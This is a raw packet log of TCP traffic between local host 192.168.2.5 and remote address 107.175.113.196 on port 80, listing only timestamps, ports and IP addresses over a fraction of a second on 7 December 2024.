Dec 7, 2024 15:47:47.422347069 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.422358036 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.422369957 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.422377110 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.422401905 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.423069000 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.423106909 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.423111916 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.423124075 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.423146009 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.423161983 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.423958063 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.424005985 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.424034119 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.424046993 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.424071074 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.424086094 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.424854040 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.424901009 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.424922943 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.424937010 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.424961090 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.424976110 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.425767899 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.425822973 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.425849915 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.425862074 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.425885916 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.425900936 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.426693916 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.426745892 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.426772118 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.426784039 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.426811934 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.427628040 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.427639961 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.427664042 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.427678108 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.427706957 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.428596020 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.428659916 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.428667068 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.428675890 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.428694963 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.428709984 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.429405928 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.429446936 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.429477930 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.429488897 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.429513931 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.429529905 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.430331945 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.430381060 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.430397034 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.430408001 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.430429935 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.430447102 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.431298971 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.431343079 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.431346893 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.431360006 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.431385994 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.431397915 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.432137012 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.432177067 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.432460070 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.432493925 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.432502031 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.432504892 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.432528973 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.432550907 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.433352947 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.433407068 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.433434963 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.433446884 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.433469057 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.433485031 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.434258938 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.434307098 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.434329987 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.434341908 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.434364080 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.434382915 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.435226917 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.435271025 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.435305119 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.435328007 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.435345888 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.435364008 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.436089039 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.436131001 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.436157942 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.436172962 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.436191082 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.436218977 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.437020063 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.437072039 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.437087059 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.437108994 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.437122107 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.437139988 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.437937975 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.437982082 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.437989950 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.438002110 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.438026905 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.438040972 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.438832998 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.438899994 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.438899994 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.438921928 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.438935041 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.438955069 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.439729929 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.439775944 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.439800024 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.439812899 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.439834118 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.439852953 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.440690994 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.440727949 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.440735102 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.440740108 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.440762043 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.440782070 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.441546917 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.441601038 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.441622019 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.441637993 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.441675901 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.442487955 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.442538023 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.442569017 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.442580938 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.442605972 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.442625999 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.443427086 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.443445921 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.443464994 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.443470955 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.443490028 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.443510056 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.444328070 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.444345951 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.444453001 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.605309010 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.605391026 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.605407000 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.605431080 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.605482101 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.605582952 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.605624914 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.605693102 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.605705023 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.605737925 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.605755091 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.606489897 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.606539965 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.606621027 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.606636047 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.606661081 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.606676102 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.607415915 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.607461929 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.607485056 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.607496023 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.607517958 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.607537031 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.608334064 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.608383894 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.608395100 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.608407021 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.608431101 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.608447075 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.609237909 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.609280109 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.609304905 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.609318972 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.609337091 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.609355927 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.610126972 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.610172033 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.610217094 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.610229015 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.610255003 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.610268116 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.611057997 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.611104012 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.611120939 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.611133099 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.611154079 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.611171007 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.611938953 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.611984968 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.612027884 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.612042904 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.612061977 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.612081051 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.612889051 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.612930059 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.612931967 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.612948895 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.612962008 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.612982035 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.613765955 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.613809109 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.613888979 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.613900900 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.613930941 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.613944054 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.614672899 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.614720106 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.614754915 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.614767075 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.614788055 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.614805937 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.615593910 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.615662098 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.615669012 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.615681887 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.615705013 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.615721941 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.616532087 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.616578102 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.616600037 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.616615057 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.616636992 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.616647959 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.617433071 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.617480993 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.617526054 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.617543936 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.617561102 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.617578983 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.618356943 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.618402958 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.618443012 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.618458033 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.618479013 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.618494987 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.619390011 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.619435072 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.619453907 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.619467020 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.619488955 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.619503975 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.620321035 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.620342970 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.620367050 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.620378017 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.620393038 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.620409012 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.621053934 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.621098995 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.621121883 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.621134043 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.621156931 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.621172905 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.621973038 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.622020960 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.622049093 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.622061968 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.622087002 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.623014927 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.623027086 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.623049021 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.623073101 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.623090982 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.623806953 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.623847961 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.623873949 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.623887062 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.623909950 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.623929977 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.624702930 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.624747992 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.624994040 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.625036001 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.625060081 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.625072002 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.625093937 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.625111103 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.625957966 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.626004934 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.626018047 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.626024008 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.626043081 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.626054049 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.626811981 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.626866102 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.626897097 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.626918077 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.626935005 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.626950026 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.627726078 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.627769947 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.627804995 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.627818108 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.627840996 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.627856016 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.628638029 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.628684044 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.628690958 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.628704071 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.628724098 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.628741026 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.629563093 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.629611015 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.629641056 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.629652977 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.629674911 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.629692078 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.630455017 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.630501032 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.630538940 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.630551100 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.630582094 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.630598068 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.631421089 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.631468058 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.631479979 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.631499052 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.631521940 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.631540060 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.632322073 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.632352114 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.632365942 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.632368088 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.632388115 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.632400990 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.633258104 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.633304119 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.633338928 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.633354902 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.633374929 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.633393049 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.634114027 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.634164095 CET	49706	80	192.168.2.5	107.175.113.196
Dec 7, 2024 15:47:47.634186029 CET	80	49706	107.175.113.196	192.168.2.5
Dec 7, 2024 15:47:47.634202003 CET	80	49706	107.175.113.196	192.168.2.5
